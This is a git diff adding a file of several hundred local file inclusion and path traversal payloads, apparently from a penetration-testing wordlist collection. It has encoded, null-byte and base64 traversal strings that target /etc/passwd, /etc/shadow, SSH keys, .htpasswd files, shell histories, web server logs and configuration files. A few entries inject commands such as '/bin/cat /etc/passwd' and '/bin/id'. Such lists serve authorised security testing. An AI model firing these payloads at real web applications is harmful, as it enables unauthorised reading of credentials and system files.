diff --git a/PHP include/JHADDIX_LFI.txt b/PHP include/JHADDIX_LFI.txt new file mode 100644 index 0000000..6f10e3f --- /dev/null +++ b/PHP include/JHADDIX_LFI.txt @@ -0,0 +1,867 @@ +/.../.../.../.../.../ +\…..\\\…..\\\…..\\\ +%00../../../../../../etc/passwd +%00/etc/passwd%00 +%00../../../../../../etc/shadow +%00/etc/shadow%00 +%0a/bin/cat%20/etc/passwd +%0a/bin/cat%20/etc/shadow +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini +/../../../../../../../../%2A +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow +..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed +..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd +..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow +=3D “/..” . “%2f.. +..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini +admin/access_log +/admin/install.php +../../../administrator/inbox +/apache2/logs/access_log +/apache2/logs/access.log +/apache2/logs/error_log +/apache2/logs/error.log +/apache/logs/access_log +/apache/logs/access.log +../../../../../apache/logs/access.log +../../../../apache/logs/access.log +../../../apache/logs/access.log +../../apache/logs/access.log +../apache/logs/access.log +/apache/logs/error_log +/apache/logs/error.log +../../../../../apache/logs/error.log +../../../../apache/logs/error.log +../../../apache/logs/error.log +../../apache/logs/error.log +../apache/logs/error.log +/apache\php\php.ini +\\'/bin/cat%20/etc/passwd\\' +\\'/bin/cat%20/etc/shadow\\' +/.bash_history +/.bash_profile +/.bashrc +/../../../../../../../../bin/id| +/bin/php.ini +/boot/grub/grub.conf +/./././././././././././boot.ini +/../../../../../../../../../../../boot.ini +/..\../..\../..\../..\../..\../..\../boot.ini +/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini +..//..//..//..//..//boot.ini +../../../../../../../../../../../../boot.ini +../../boot.ini +..\../..\../..\../..\../boot.ini +..\../..\../boot.ini +..\..\..\..\..\..\..\..\..\..\boot.ini +\..\..\..\..\..\..\..\..\..\..\boot.ini +/../../../../../../../../../../../boot.ini%00 +../../../../../../../../../../../../boot.ini%00 +..\..\..\..\..\..\..\..\..\..\boot.ini%00 +/../../../../../../../../../../../boot.ini%00.html +/../../../../../../../../../../../boot.ini%00.jpg +/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd +..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow +c:\apache\logs\access.log +c:\apache\logs\error.log +c:\AppServ\MySQL +C:/boot.ini +C:\boot.ini +/C:/inetpub/ftproot/ +C:/inetpub/wwwroot/global.asa +C:\inetpub\wwwroot\global.asa +c:\inetpub\wwwroot\index.asp +/config.asp +../config.asp +config.asp +../config.inc.php +config.inc.php +../config.js +config.js +_config.php +../_config.php +../config.php +config.php +../_config.php%00 +../../../../../../../../conf/server.xml +/core/config.php +/C:\Program Files\ +c:\Program Files\Apache Group\Apache\logs\access.log +c:\Program Files\Apache Group\Apache\logs\error.log +/.cshrc +c:\System32\Inetsrv\metabase.xml +c:WINDOWS/system32/ +d:\AppServ\MySQL +database.asp +database.js +database.php +data.php +dbase.php a +db.php +../../../../../../../dev +/D:\Program Files\ +d:\System32\Inetsrv\metabase.xml +/etc/apache2/apache2.conf +/etc/apache2/conf/httpd.conf +/etc/apache2/httpd.conf +/etc/apache2/sites-available/default +/etc/apache2/vhosts.d/default_vhost.include +/etc/apache/apache.conf +/etc/apache/conf/httpd.conf +/etc/apache/httpd.conf +/etc/apt/sources.list +/etc/chrootUsers +/etc/crontab +/etc/defaultdomain +/etc/default/passwd +/etc/defaultrouter +/etc/fstab +/etc/ftpchroot +/etc/ftphosts +/etc/group +/etc/hostname.bge +/etc/hostname.ce0 +/etc/hostname.ce1 +/etc/hostname.ce2 +/etc/hostname.ce3 +/etc/hostname.dcelx0 +/etc/hostname.dcelx1 +/etc/hostname.dcelx2 +/etc/hostname.dcelx3 +/etc/hostname.dmfe0 +/etc/hostname.dmfe1 +/etc/hostname.dmfe2 +/etc/hostname.dmfe3 +/etc/hostname.dnet0 +/etc/hostname.dnet1 +/etc/hostname.dnet2 +/etc/hostname.dnet3 +/etc/hostname.ecn0 +/etc/hostname.ecn1 +/etc/hostname.ecn2 +/etc/hostname.ecn3 +/etc/hostname.elx0 +/etc/hostname.elx1 +/etc/hostname.elx2 +/etc/hostname.elx3 +/etc/hostname.elxl0 +/etc/hostname.elxl1 +/etc/hostname.elxl2 +/etc/hostname.elxl3 +/etc/hostname.eri0 +/etc/hostname.eri1 +/etc/hostname.eri2 +/etc/hostname.eri3 +/etc/hostname.ge0 +/etc/hostname.ge1 +/etc/hostname.ge2 +/etc/hostname.ge3 +/etc/hostname.hme0 +/etc/hostname.hme1 +/etc/hostname.hme2 +/etc/hostname.hme3 +/etc/hostname.ieef0 +/etc/hostname.ieef1 +/etc/hostname.ieef2 +/etc/hostname.ieef3 +/etc/hostname.iprb0 +/etc/hostname.iprb1 +/etc/hostname.iprb2 +/etc/hostname.iprb3 +/etc/hostname.le0 +/etc/hostname.le1 +/etc/hostname.le2 +/etc/hostname.le3 +/etc/hostname.lo +/etc/hostname.pcn0 +/etc/hostname.pcn1 +/etc/hostname.pcn2 +/etc/hostname.pcn3 +/etc/hostname.qfe0 +/etc/hostname.qfe1 +/etc/hostname.qfe2 +/etc/hostname.qfe3 +/etc/hostname.spwr0 +/etc/hostname.spwr1 +/etc/hostname.spwr2 +/etc/hostname.spwr3 +/etc/hosts +../../../../../../../../../../../../etc/hosts +../../../../../../../../../../../../etc/hosts%00 +/etc/hosts.allow +/etc/hosts.deny +/etc/hosts.equiv +/etc/http/conf/httpd.conf +/etc/httpd.conf +/etc/httpd/conf.d/php.conf +/etc/httpd/conf.d/squirrelmail.conf +/etc/httpd/conf.d/ssl.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/acces_log +/etc/httpd/logs/acces.log +../../../../../../../etc/httpd/logs/acces_log +../../../../../../../etc/httpd/logs/acces.log +/etc/httpd/logs/access_log +/etc/httpd/logs/access.log +../../../../../etc/httpd/logs/access_log +../../../../../etc/httpd/logs/access.log +/etc/httpd/logs/error_log +/etc/httpd/logs/error.log +../../../../../../../etc/httpd/logs/error_log +../../../../../../../etc/httpd/logs/error.log +../../../../../etc/httpd/logs/error_log +../../../../../etc/httpd/logs/error.log +/etc/httpd/php.ini +/etc/http/httpd.conf +/etc/inetd.conf +/etc/init.d/apache +/etc/init.d/apache2 +/etc/issue +/etc/logrotate.d/ftp +/etc/logrotate.d/httpd +/etc/logrotate.d/proftpd +/etc/logrotate.d/vsftpd.log +/etc/mail/access +/etc/mailman/mm_cfg.py +/etc/make.conf +/etc/master.passwd +/etc/motd +/etc/my.cnf +/etc/mysql/my.cnf +/etc/netconfig +/etc/nsswitch.conf +/etc/opt/ipf/ipf.conf +/etc/opt/ipf/ipnat.conf +/./././././././././././etc/passwd +/../../../../../../../../../../etc/passwd +/../../../../../../../../../../etc/passwd^^ +/..\../..\../..\../..\../..\../..\../etc/passwd +/etc/passwd +../../../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../etc/passwd +../../../../../../../../../../etc/passwd +../../../../../../../../../etc/passwd +../../../../../../../../etc/passwd +../../../../../../../etc/passwd +../../../../../../etc/passwd +../../../../../etc/passwd +../../../../etc/passwd +../../../etc/passwd +../../etc/passwd +../etc/passwd +..\..\..\..\..\..\..\..\..\..\etc\passwd +.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd +\..\..\..\..\..\..\..\..\..\..\etc\passwd +etc/passwd +/etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../etc/passwd%00 +../../../../../../../../../etc/passwd%00 +../../../../../../../../etc/passwd%00 +../../../../../../../etc/passwd%00 +../../../../../../etc/passwd%00 +../../../../../etc/passwd%00 +../../../../etc/passwd%00 +../../../etc/passwd%00 +../../etc/passwd%00 +../etc/passwd%00 +..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +/../../../../../../../../../../../etc/passwd%00.html +/../../../../../../../../../../../etc/passwd%00.jpg +../../../../../../etc/passwd&=%3C%3C%3C%3C +/etc/php4.4/fcgi/php.ini +/etc/php4/apache2/php.ini +/etc/php4/apache/php.ini +/etc/php4/cgi/php.ini +/etc/php5/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/cgi/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.d/dom.ini +/etc/php.d/gd.ini +/etc/php.d/imap.ini +/etc/php.d/json.ini +/etc/php.d/ldap.ini +/etc/php.d/mbstring.ini +/etc/php.d/mysqli.ini +/etc/php.d/mysql.ini +/etc/php.d/odbc.ini +/etc/php.d/pdo.ini +/etc/php.d/pdo_mysql.ini +/etc/php.d/pdo_odbc.ini +/etc/php.d/pdo_pgsql.ini +/etc/php.d/pdo_sqlite.ini +/etc/php.d/pgsql.ini +/etc/php.d/xmlreader.ini +/etc/php.d/xmlwriter.ini +/etc/php.d/xsl.ini +/etc/php.d/zip.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/postfix/mydomains +/etc/proftp.conf +/etc/proftpd/modules.conf +/etc/protpd/proftpd.conf +/etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb +/etc/release +/etc/resolv.conf +/etc/rpc +/etc/security/environ +/etc/security/failedlogin +/etc/security/group +/etc/security/lastlog +/etc/security/limits +/etc/security/passwd +/etc/security/user +/./././././././././././etc/shadow +/../../../../../../../../../../etc/shadow +/../../../../../../../../../../etc/shadow^^ +/..\../..\../..\../..\../..\../..\../etc/shadow +/etc/shadow +../../../../../../../../../../../../etc/shadow +..\..\..\..\..\..\..\..\..\..\etc\shadow +.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow +\..\..\..\..\..\..\..\..\..\..\etc\shadow +../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 +../../../../../../../../../../../../etc/shadow%00 +..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +etc/shadow%00 +/etc/ssh/sshd_config +/etc/sudoers +/etc/syslog.conf +/etc/syslogd.conf +/etc/system +/etc/updatedb.conf +/etc/utmp +/etc/vfstab +/etc/vhcs2/proftpd/proftpd.conf +/etc/vsftpd.chroot_list +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/wtmp +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/.forward +/home2\bin\stable\apache\php.ini +/home/apache/conf/httpd.conf +/home/apache/httpd.conf +/home\bin\stable\apache\php.ini +/.htpasswd +.htpasswd +../.htpasswd +../install.php +install.php +../../../../../../../../../../../../localstart.asp +../../../../../../../../../../../../localstart.asp%00 +/log/miscDir/accesslog +/.logout +/logs/access_log +/logs/access.log +../../../../../logs/access.log +../../../../logs/access.log +../../../logs/access.log +../../logs/access.log +../logs/access.log +/logs/error_log +/logs/error.log +../../../../../logs/error.log +../../../../logs/error.log +../../../logs/error.log +../../logs/error.log +../logs/error.log +/logs/pure-ftpd.log +/master.passwd +member/.htpasswd +members/.htpasswd +/.netrc +/NetServer\bin\stable\apache\php.ini +/opt/apache2/conf/httpd.conf +/opt/apache/conf/httpd.conf +/opt/lampp/logs/access_log +/opt/lampp/logs/access.log +/opt/lampp/logs/error_log +/opt/lampp/logs/error.log +/opt/xampp/etc/php.ini +/opt/xampp/logs/access_log +/opt/xampp/logs/access.log +/opt/xampp/logs/error_log +/opt/xampp/logs/error.log +.pass +../.pass +pass.dat +passwd +/.passwd +.passwd +../.passwd +passwd.dat +/php4\php.ini +/php5\php.ini +/php\php.ini +/PHP\php.ini +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf.default +/proc/cpuinfo +/proc/interrupts +/proc/loadavg +/proc/meminfo +/proc/mounts +/proc/net/arp +/proc/net/dev +/proc/net/route +/proc/net/tcp +/proc/partitions +/proc/self/cmdline +/proc/self/envron +/proc/version +/.profile +/Program Files\Apache Group\Apache2\conf\httpd.conf +/Program Files\Apache Group\Apache\conf\httpd.conf +/Program Files\Apache Group\Apache\logs\access.log +/Program Files\Apache Group\Apache\logs\error.log +/Program Files\xampp\apache\conf\httpd.conf +/../../../../pswd +/.rhosts +/root/.bash_history +/root/.bash_logut +root/.htpasswd +/root/.ksh_history +/root/.Xauthority +/.sh_history +/.shosts +/.ssh/authorized_keys +user/.htpasswd +../users.db.php +users.db.php +users/.htpasswd +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/lib/cron/log +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/lib/security/mkuser.default +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.log +/usr/local/apache/conf/httpd.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/httpd.conf +/usr/local/apache/log +/usr/local/apache/logs +/usr/local/apache/logs/access_log +/usr/local/apache/logs/access_ log +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access. log +../../../../../../../usr/local/apache/logs/access_ log +../../../../../../../usr/local/apache/logs/access. log +../../../../../usr/local/apache/logs/access_log +../../../../../usr/local/apache/logs/access.log +/usr/local/apache/logs/error_log +/usr/local/apache/logs/error.log +../../../../../../../usr/local/apache/logs/error_l og +../../../../../../../usr/local/apache/logs/error.l og +../../../../../usr/local/apache/logs/error_log +../../../../../usr/local/apache/logs/error.log +/usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache/conf/httpd.conf +/usr/local/cpanel/logs +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/stats_log +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/vhosts.conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/httpd/logs/access_log +/usr/local/etc/httpd/logs/error_log +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/httpd/conf/httpd.conf +/usr/local/lib/php.ini +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/www/logs/thttpd_log +/usr/local/Zend/etc/php.ini +/usr/pkgsrc/net/pureftpd/ +/usr/ports/contrib/pure-ftpd/ +/usr/ports/ftp/pure-ftpd/ +/usr/ports/net/pure-ftpd/ +/usr/sbin/pure-config.pl +/usr/spool/lp/log +/usr/spool/mqueue/syslog +/var/adm +/var/adm/acct/sum/loginlog +/var/adm/aculog +/var/adm/aculogs +/var/adm/crash/unix +/var/adm/crash/vmcore +/var/adm/cron/log +/var/adm/dtmp +/var/adm/lastlog +/var/adm/lastlog/username +/var/adm/log/asppp.log +/var/adm/loginlog +/var/adm/log/xferlog +/var/adm/lp/lpd-errs +/var/adm/messages +/var/adm/pacct +/var/adm/qacct +/var/adm/ras/bootlog +/var/adm/ras/errlog +/var/adm/sulog +/var/adm/SYSLOG +/var/adm/utmp +/var/adm/utmpx +/var/adm/vold.log +/var/adm/wtmp +/var/adm/wtmpx +/var/adm/X0msgs +/var/apache/log +/var/apache/logs +/var/apache/logs/access_log +/var/apache/logs/error_log +/var/cpanel/cpanel.config +/var/cron/log +/var/lib/mlocate/mlocate.db +/var/lib/mysql/my.cnf +/var/local/www/conf/php.ini +/var/lock/samba +/var/log +/var/log/access_log +/var/log/access.log +../../../../../../../var/log/access_log +../../../../../../../var/log/access.log +../../../../../var/log/access_log +/var/log/acct +/var/log/apache2/access_log +/var/log/apache2/access.log +../../../../../../../var/log/apache2/access_log +../../../../../../../var/log/apache2/access.log +/var/log/apache2/error_log +/var/log/apache2/error.log +../../../../../../../var/log/apache2/error_log +../../../../../../../var/log/apache2/error.log +/var/log/apache/access_log +/var/log/apache/access.log +../../../../../../../var/log/apache/access_log +../../../../../../../var/log/apache/access.log +../../../../../var/log/apache/access_log +../../../../../var/log/apache/access.log +/var/log/apache/error_log +/var/log/apache/error.log +../../../../../../../var/log/apache/error_log +../../../../../../../var/log/apache/error.log +../../../../../var/log/apache/error_log +../../../../../var/log/apache/error.log +/var/log/apache-ssl/access.log +/var/log/apache-ssl/error.log +/var/log/auth +/var/log/authlog +/var/log/auth.log +/var/log/boot.log +/var/log/cron.log +/var/log/dmesg +/var/log/error_log +/var/log/error.log +../../../../../../../var/log/error_log +../../../../../../../var/log/error.log +../../../../../var/log/error_log +/var/log/exim_mainlog +/var/log/exim/mainlog +/var/log/exim_paniclog +/var/log/exim/paniclog +/var/log/exim_rejectlog +/var/log/exim/rejectlog +/var/log/ftplog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/httpd/ +/var/log/httpd/access_log +/var/log/httpd/access.log +../../../../../var/log/httpd/access_log +/var/log/httpd/error_log +/var/log/httpd/error.log +../../../../../var/log/httpd/error_log +/var/log/httpsd/ssl.access_log +/var/log/httpsd/ssl_log +/var/log/kern.log +/var/log/lastlog +/var/log/lighttpd +/var/log/maillog +/var/log/message +/var/log/messages +/var/log/mysqlderror.log +/var/log/mysqld.log +/var/log/mysql.log +/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql.log +/var/log/mysql/mysql-slow.log +/var/log/ncftpd.errs +/var/log/ncftpd/misclog.txt +/var/log/news +/var/log/news.all +/var/log/news/news +/var/log/news/news.all +/var/log/news/news.crit +/var/log/news/news.err +/var/log/news/news.notice +/var/log/news/suck.err +/var/log/news/suck.notice +/var/log/poplog +/var/log/POPlog +/var/log/proftpd +/var/log/proftpd.access_log +/var/log/proftpd.xferlog +/var/log/proftpd/xferlog.legacy +/var/log/pureftpd.log +/var/log/pure-ftpd/pure-ftpd.log +/var/log/qmail +/var/log/qmail/ +/var/log/samba +/var/log/samba-log.%m +/var/log/secure +/var/log/smtpd +/var/log/spooler +/var/log/syslog +/var/log/telnetd +/var/log/thttpd_log +/var/log/utmp +/var/log/vsftpd.log +/var/log/wtmp +/var/log/xferlog +/var/log/yum.log +/var/lp/logs/lpNet +/var/lp/logs/lpsched +/var/lp/logs/requests +/var/mysql.log +/var/run/httpd.pid +/var/run/mysqld/mysqld.pid +/var/run/utmp +/var/saf/_log +/var/saf/port/log +/var/spool/errors +/var/spool/locks +/var/spool/logs +/var/spool/tmp +/var/www/conf/httpd.conf +/var/www/html/.htaccess +/var/www/localhost/htdocs/.htaccess +/var/www/log/access_log +/var/www/log/error_log +/../../var/www/logs/access_log +/var/www/logs/access_log +/var/www/logs/access.log +../../../../../../../var/www/logs/access_log +../../../../../../../var/www/logs/access.log +../../../../../var/www/logs/access.log +/var/www/logs/error_log +/var/www/logs/error.log +../../../../../../../var/www/logs/error_log +../../../../../../../var/www/logs/error.log +../../../../../var/www/logs/error_log +../../../../../var/www/logs/error.log +/var/www/sitename/htdocs/ +/var/www/vhosts/sitename/httpdocs/.htaccess +/var/www/web1/html/.htaccess +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default +/web/conf/php.ini +/WINDOWS\php.ini +../../windows/win.ini +/WINNT\php.ini +/..\..\..\..\..\..\winnt\win.ini +/www/logs/proftpd.system.log +/xampp\apache\bin\php.ini +/.Xauthority +..2fapache2flogs2ferror.log +..2fapache2flogs2faccess.log +..2f..2fapache2flogs2ferror.log +..2f..2fapache2flogs2faccess.log +..2f..2f..2fapache2flogs2ferror.log +..2f..2f..2fapache2flogs2faccess.log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log +..2fetc2fpasswd +..2fetc2fpasswd%00 +..2f..2fetc2fpasswd +..2f..2fetc2fpasswd%00 +..2f..2f..2fetc2fpasswd +..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 +..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 +L2V0Yy9tYXN0ZXIucGFzc3dk +L21hc3Rlci5wYXNzd2Q= +ZXRjL3Bhc3N3ZA== +ZXRjL3NoYWRvdyUwMA== +L2V0Yy9wYXNzd2Q= 